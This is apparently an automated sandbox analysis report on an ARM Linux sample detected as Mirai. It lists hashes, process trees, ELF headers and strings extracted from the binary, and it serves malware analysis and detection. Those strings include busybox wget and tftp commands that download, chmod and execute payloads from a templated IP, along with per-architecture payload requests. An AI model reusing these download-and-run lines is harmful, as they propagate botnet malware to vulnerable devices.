Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
Z8xEavXrld

Overview

General Information

Sample Name:Z8xEavXrld
Analysis ID:679610
MD5:a88fe5d28e2f429c1a9f3f6962d791dc
SHA1:8ec9d983a5fe3331d828e21a5016e2012ef7a1ba
SHA256:4c58714e73e90af2e481dca0e772c18d38878934c6c9de747d9de4997b227ad6
Tags:32armelfgafgyt
Infos:

Detection

Mirai
Score:60
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Sets full permissions to files and/or directories
Sample contains strings that are potentially command strings
Executes the "mkdir" command used to create folders
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:679610
Start date and time: 06/08/202205:13:312022-08-06 05:13:31 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 52s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:Z8xEavXrld
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal60.troj.lin@0/0@0/0
Command:/tmp/Z8xEavXrld
PID:6231
Exit Code:1
Exit Code Info:
Killed:False
Standard Output:
hello friend :)
Standard Error:
  • system is lnxubuntu20
  • Z8xEavXrld (PID: 6231, Parent: 6128, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/Z8xEavXrld
    • Z8xEavXrld New Fork (PID: 6233, Parent: 6231)
      • Z8xEavXrld New Fork (PID: 6235, Parent: 6233)
        • sh (PID: 6238, Parent: 6235, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir /rx05a34hf0/ && >/rx05a34hf0/rx05a34hf0 && cd /rx05a34hf0/ >/dev/null"
          • sh New Fork (PID: 6241, Parent: 6238)
          • mkdir (PID: 6241, Parent: 6238, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir /rx05a34hf0/
        • sh (PID: 6242, Parent: 6235, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mv /tmp/Z8xEavXrld /rx05a34hf0/rx05a34hf0 && chmod 777 /rx05a34hf0/rx05a34hf0 >/dev/null"
          • sh New Fork (PID: 6244, Parent: 6242)
          • mv (PID: 6244, Parent: 6242, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/Z8xEavXrld /rx05a34hf0/rx05a34hf0
          • sh New Fork (PID: 6245, Parent: 6242)
          • chmod (PID: 6245, Parent: 6242, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 /rx05a34hf0/rx05a34hf0
  • cleanup
SourceRuleDescriptionAuthorStrings
Z8xEavXrldJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6233.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6231.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Z8xEavXrldVirustotal: Detection: 40%Perma Link
        Source: Z8xEavXrldReversingLabs: Detection: 48%
        Source: Z8xEavXrldString found in binary or memory: http://%d.%d.%d.%d:%d/snickers/%s
        Source: Initial samplePotential command found: GET /snickers/arm HTTP/1.0
        Source: Initial samplePotential command found: GET /snickers/arm7 HTTP/1.0
        Source: Initial samplePotential command found: GET /snickers/mips HTTP/1.0
        Source: Initial samplePotential command found: GET /snickers/mipsel HTTP/1.0
        Source: Initial samplePotential command found: GET /snickers/powerpc HTTP/1.0
        Source: Initial samplePotential command found: GET /snickers/sh4 HTTP/1.0
        Source: Initial samplePotential command found: GET /snickers/m68k HTTP/1.0
        Source: Initial samplePotential command found: GET /snickers/sparc HTTP/1.0
        Source: Z8xEavXrldELF static info symbol of initial sample: hide_maps_proc
        Source: Z8xEavXrldELF static info symbol of initial sample: kill_scanners
        Source: Z8xEavXrldELF static info symbol of initial sample: password_size
        Source: Z8xEavXrldELF static info symbol of initial sample: passwords
        Source: Z8xEavXrldELF static info symbol of initial sample: scanner_raw_buf
        Source: Initial sampleString containing 'busybox' found: /bin/busybox SNICKERS
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox okayuwu && >okayuwu && /bin/busybox chmod 777 okayuwu
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
        Source: Initial sampleString containing 'busybox' found: >%sokayuwu && cd %s && >retrieve; >okayuwu/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox okayuwu && >okayuwu && /bin/busybox chmod 777 okayuwu
        Source: Initial sampleString containing 'busybox' found: >>>/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
        Source: Initial sampleString containing 'busybox' found: /bin/busybox DMSNA
        Source: Initial sampleString containing 'busybox' found: /bin/busybox mkdir %s; >%s.file && cd %s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox rm -rf .file %s %s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d:%d/snickers/%s -O -> %s; /bin/busybox chmod 777 %s; ./%s telnet.%s.wget; >%s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -r %s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s telnet.%s.tftp; >%s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
        Source: Initial sampleString containing 'busybox' found: mipsmipselpowerpcsh4m68ksparc/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s
        Source: classification engineClassification label: mal60.troj.lin@0/0@0/0
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/string/arm/_memcpy.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/string/arm/memcpy.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/string/arm/memmove.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/string/arm/memset.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/string/arm/strlen.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/sysdeps/linux/arm/crt1.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/sysdeps/linux/arm/crti.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/sysdeps/linux/arm/crtn.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/sysdeps/linux/arm/sigrestorer.S
        Source: Z8xEavXrldELF static info symbol of initial sample: libc/sysdeps/linux/arm/vfork.S

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 6245)Chmod executable with 777: /usr/bin/chmod -> chmod 777 /rx05a34hf0/rx05a34hf0
        Source: /bin/sh (PID: 6241)Mkdir executable: /usr/bin/mkdir -> mkdir /rx05a34hf0/
        Source: /usr/bin/chmod (PID: 6245)File: /rx05a34hf0/rx05a34hf0 (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
        Source: /bin/sh (PID: 6245)Chmod executable: /usr/bin/chmod -> chmod 777 /rx05a34hf0/rx05a34hf0
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1582/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1582/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2033/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2033/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1612/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1612/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1579/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1579/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1699/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1699/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1335/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1335/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1698/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1698/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2028/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2028/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1334/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1334/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1576/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1576/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2025/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2025/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/910/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/910/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/912/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/912/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/517/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/517/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/759/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/759/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/918/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/918/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1594/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1594/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1349/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1349/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1623/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1623/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/761/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/761/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1622/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1622/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/884/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/884/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1983/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1983/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2038/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2038/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1344/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1344/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1465/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1465/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1586/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1586/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1860/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1860/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1463/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1463/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/800/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/800/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/801/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/801/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1629/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1629/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1627/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1627/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1900/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1900/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/491/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/491/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2050/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2050/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1877/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1877/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/772/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/772/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1633/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1633/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1599/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1599/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1632/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1632/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/774/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/774/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1477/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1477/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/654/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/654/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/896/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/896/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1476/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1476/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1872/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1872/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2048/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/2048/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/655/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/655/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1475/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/1475/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/656/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/656/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/777/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/777/exe
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/657/maps
        Source: /tmp/Z8xEavXrld (PID: 6246)File opened: /proc/657/exe
        Source: /tmp/Z8xEavXrld (PID: 6238)Shell command executed: sh -c "mkdir /rx05a34hf0/ && >/rx05a34hf0/rx05a34hf0 && cd /rx05a34hf0/ >/dev/null"
        Source: /tmp/Z8xEavXrld (PID: 6242)Shell command executed: sh -c "mv /tmp/Z8xEavXrld /rx05a34hf0/rx05a34hf0 && chmod 777 /rx05a34hf0/rx05a34hf0 >/dev/null"
        Source: /tmp/Z8xEavXrld (PID: 6231)Queries kernel information via 'uname':
        Source: Z8xEavXrld, 6231.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp, Z8xEavXrld, 6233.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/Z8xEavXrldSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Z8xEavXrld
        Source: Z8xEavXrld, 6231.1.00005644727ab000.00005644728d9000.rw-.sdmp, Z8xEavXrld, 6233.1.00005644727ab000.00005644728d9000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: Z8xEavXrld, 6231.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmp, Z8xEavXrld, 6233.1.00007ffe5ab11000.00007ffe5ab32000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
        Source: Z8xEavXrld, 6231.1.00005644727ab000.00005644728d9000.rw-.sdmp, Z8xEavXrld, 6233.1.00005644727ab000.00005644728d9000.rw-.sdmpBinary or memory string: #|rDVP%|rDVP"|rDV!/etc/qemu-binfmt/arm

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Z8xEavXrld, type: SAMPLE
        Source: Yara matchFile source: 6233.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6231.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Z8xEavXrld, type: SAMPLE
        Source: Yara matchFile source: 6233.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6231.1.00007fe4e8017000.00007fe4e8033000.r-x.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter
        Path InterceptionPath Interception1
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Scripting
        Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
        File and Directory Permissions Modification
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Scripting
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 679610 Sample: Z8xEavXrld Startdate: 06/08/2022 Architecture: LINUX Score: 60 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected Mirai 2->32 9 Z8xEavXrld 2->9         started        process3 process4 11 Z8xEavXrld 9->11         started        process5 13 Z8xEavXrld 11->13         started        process6 15 Z8xEavXrld sh 13->15         started        17 Z8xEavXrld sh 13->17         started        19 Z8xEavXrld 13->19         started        21 3 other processes 13->21 process7 23 sh chmod 15->23         started        26 sh mv 15->26         started        28 sh mkdir 17->28         started        signatures8 34 Sets full permissions to files and/or directories 23->34
        SourceDetectionScannerLabelLink
        Z8xEavXrld41%VirustotalBrowse
        Z8xEavXrld49%ReversingLabsLinux.Trojan.Mirai
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://%d.%d.%d.%d:%d/snickers/%s0%Avira URL Cloudsafe
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://%d.%d.%d.%d:%d/snickers/%sZ8xEavXrldfalse
        • Avira URL Cloud: safe
        low
        No contacted IP infos
        No context
        No context
        No context
        No context
        No context
        No created / dropped files found
        File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, with debug_info, not stripped
        Entropy (8bit):6.102446034377879
        TrID:
        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
        File name:Z8xEavXrld
        File size:146762
        MD5:a88fe5d28e2f429c1a9f3f6962d791dc
        SHA1:8ec9d983a5fe3331d828e21a5016e2012ef7a1ba
        SHA256:4c58714e73e90af2e481dca0e772c18d38878934c6c9de747d9de4997b227ad6
        SHA512:16b40c938d58f44ec6208960f7202d2f716eb2700edea7c802d8f991fc23def309c910d62757332c3c33aa08fded1c12b8b816ca4536cbe357c599e29244b724
        SSDEEP:3072:QQWK7q4d3HcKMLASEyzKYvdrAFwwztgiQv9VvzeUTUDT01wfm8S8lDngh/aJN:nWhUnFwT1Mbzt4v9VvzeUy4Gfm+tnBz
        TLSH:59E3E707F9518A53C5D157BAF69F06883726B764C3DB33039988AF702F4E5982E6E2D0
        File Content Preview:.ELF...a..........(.........4...,.......4. ...(..........................................................3..........Q.td..................................-...L."....W..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

        ELF header

        Class:ELF32
        Data:2's complement, little endian
        Version:1 (current)
        Machine:ARM
        Version Number:0x1
        Type:EXEC (Executable file)
        OS/ABI:ARM - ABI
        ABI Version:0
        Entry Point Address:0x8190
        Flags:0x202
        ELF Header Size:52
        Program Header Offset:52
        Program Header Size:32
        Number of Program Headers:3
        Section Header Offset:119852
        Section Header Size:40
        Number of Section Headers:20
        Header String Table Index:17
        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
        NULL0x00x00x00x00x0000
        .initPROGBITS0x80940x940x180x00x6AX004
        .textPROGBITS0x80b00xb00x15f6c0x00x6AX0016
        .finiPROGBITS0x1e01c0x1601c0x140x00x6AX004
        .rodataPROGBITS0x1e0300x160300x4fd00x00x2A004
        .eh_framePROGBITS0x230000x1b0000x40x00x2A004
        .ctorsPROGBITS0x2b0040x1b0040x80x00x3WA004
        .dtorsPROGBITS0x2b00c0x1b00c0x80x00x3WA004
        .jcrPROGBITS0x2b0140x1b0140x40x00x3WA004
        .dataPROGBITS0x2b0180x1b0180x9080x00x3WA004
        .bssNOBITS0x2b9200x1b9200x29e80x00x3WA004
        .commentPROGBITS0x00x1b9200x9b80x00x0001
        .debug_arangesPROGBITS0x00x1c2d80x1200x00x0008
        .debug_infoPROGBITS0x00x1c3f80x5780x00x0001
        .debug_abbrevPROGBITS0x00x1c9700xb40x00x0001
        .debug_linePROGBITS0x00x1ca240x8bd0x00x0001
        .debug_framePROGBITS0x00x1d2e40xa00x00x0004
        .shstrtabSTRTAB0x00x1d3840xa80x00x0001
        .symtabSYMTAB0x00x1d74c0x43d00x100x0196274
        .strtabSTRTAB0x00x21b1c0x222e0x00x0001
        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
        LOAD0x00x80000x80000x1b0040x1b0046.16320x5R E0x8000.init .text .fini .rodata .eh_frame
        LOAD0x1b0040x2b0040x2b0040x91c0x33044.63770x6RW 0x8000.ctors .dtors .jcr .data .bss
        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
        NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
        .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
        .symtab0x80940SECTION<unknown>DEFAULT1
        .symtab0x80b00SECTION<unknown>DEFAULT2
        .symtab0x1e01c0SECTION<unknown>DEFAULT3
        .symtab0x1e0300SECTION<unknown>DEFAULT4
        .symtab0x230000SECTION<unknown>DEFAULT5
        .symtab0x2b0040SECTION<unknown>DEFAULT6
        .symtab0x2b00c0SECTION<unknown>DEFAULT7
        .symtab0x2b0140SECTION<unknown>DEFAULT8
        .symtab0x2b0180SECTION<unknown>DEFAULT9
        .symtab0x2b9200SECTION<unknown>DEFAULT10
        .symtab0x00SECTION<unknown>DEFAULT11
        .symtab0x00SECTION<unknown>DEFAULT12
        .symtab0x00SECTION<unknown>DEFAULT13
        .symtab0x00SECTION<unknown>DEFAULT14
        .symtab0x00SECTION<unknown>DEFAULT15
        .symtab0x00SECTION<unknown>DEFAULT16
        .symtab0x00SECTION<unknown>DEFAULT17
        .symtab0x00SECTION<unknown>DEFAULT18
        .symtab0x00SECTION<unknown>DEFAULT19
        $a.symtab0x80940NOTYPE<unknown>DEFAULT1
        $a.symtab0x1e01c0NOTYPE<unknown>DEFAULT3
        $a.symtab0x80b00NOTYPE<unknown>DEFAULT2
        $a.symtab0x81280NOTYPE<unknown>DEFAULT2
        $a.symtab0x1e0280NOTYPE<unknown>DEFAULT3
        $a.symtab0x81880NOTYPE<unknown>DEFAULT2
        $a.symtab0x80a00NOTYPE<unknown>DEFAULT1
        $a.symtab0x1dfe00NOTYPE<unknown>DEFAULT2
        $a.symtab0x1e0140NOTYPE<unknown>DEFAULT2
        $a.symtab0x80a40NOTYPE<unknown>DEFAULT1
        $a.symtab0x80a80NOTYPE<unknown>DEFAULT1
        $a.symtab0x1e02c0NOTYPE<unknown>DEFAULT3
        $a.symtab0x81900NOTYPE<unknown>DEFAULT2
        $a.symtab0x81cc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x82280NOTYPE<unknown>DEFAULT2
        $a.symtab0x82d80NOTYPE<unknown>DEFAULT2
        $a.symtab0x831c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x844c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x85a80NOTYPE<unknown>DEFAULT2
        $a.symtab0x86040NOTYPE<unknown>DEFAULT2
        $a.symtab0x866c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x87400NOTYPE<unknown>DEFAULT2
        $a.symtab0x89300NOTYPE<unknown>DEFAULT2
        $a.symtab0x8a3c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x8c580NOTYPE<unknown>DEFAULT2
        $a.symtab0x8e780NOTYPE<unknown>DEFAULT2
        $a.symtab0x95d80NOTYPE<unknown>DEFAULT2
        $a.symtab0x9d380NOTYPE<unknown>DEFAULT2
        $a.symtab0xa49c0NOTYPE<unknown>DEFAULT2
        $a.symtab0xabfc0NOTYPE<unknown>DEFAULT2
        $a.symtab0xb3600NOTYPE<unknown>DEFAULT2
        $a.symtab0xbac00NOTYPE<unknown>DEFAULT2
        $a.symtab0xbb9c0NOTYPE<unknown>DEFAULT2
        $a.symtab0xbc780NOTYPE<unknown>DEFAULT2
        $a.symtab0xbcbc0NOTYPE<unknown>DEFAULT2
        $a.symtab0xc8540NOTYPE<unknown>DEFAULT2
        $a.symtab0xc8680NOTYPE<unknown>DEFAULT2
        $a.symtab0xcb700NOTYPE<unknown>DEFAULT2
